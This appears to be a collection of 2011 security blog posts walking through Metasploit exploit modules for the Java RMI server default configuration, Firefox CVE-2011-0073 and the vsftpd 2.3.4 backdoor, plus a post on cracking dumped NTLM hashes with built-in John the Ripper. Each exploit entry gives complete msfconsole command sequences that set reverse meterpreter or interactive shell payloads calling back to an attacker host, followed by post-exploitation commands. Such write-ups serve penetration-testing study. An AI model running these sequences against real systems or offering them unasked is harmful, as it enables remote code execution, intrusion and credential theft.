Java RMI Server Insecure Default Configuration Java Code Execution

Exploits, Metasploit,

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and bellow
Firefox 3.5.18 and bellow
Seamonkey 2.0.13 and bellow

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Built in John the Ripper (jtr_crack_fast) into Metasploit

Metasploit

Metasploit team has release a John the Ripper password cracker integration into Metasploit. Now it is directly possible to crack weak passwords gathered in hashes files, or LANMAN/NTLM, hashdump in msfconsole.

JtR is integrated as an “analyze” auxiliary module, called “jtr_crack_fast ” and can be used by typing this command :

In order to use you this auxiliary module you first need to have Metasploit database support (postgres or mysql) and to be connected to this database. To create and/or connect you to a database, you only need to type theses commands :

If you don’t have an existing database, “db_connect” will create the database for you. Also you can use “db_status” command to verify your connexion.

Once you have exploit a Windows box and got a session with SYSTEM privileges, you can gather all LANMAN/NTLM hasdumps with the “hashdump” post exploitation module.

All gathered hasdumps are stored into the “creds” table of the database.

Now, that you have hashdumps in the database you try to crack weak passwords with the integrated Metasploit John the Ripper.

If password are cracked successfully, these cracked passwords are then also stored in the “creds” table of the database.

Metasploit build in JtR include standard wordlist and rules, but you can also provide to the module the directory path how is containing JtR (JOHN_BASE), and also the absolute path to the JtR executable (JOHN_PATH).

john.conf” file is located by default in “/opt/metasploit3/msf3/data/john/confs/john.conf” and the wordlist into “/opt/metasploit3/msf3/data/john/wordlists/password.lst“.

vsftpd v2.3.4 Backdoor Command Execution

Exploits, Metasploit,

Timeline :

Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastbin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 from 2011-06-30 to 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a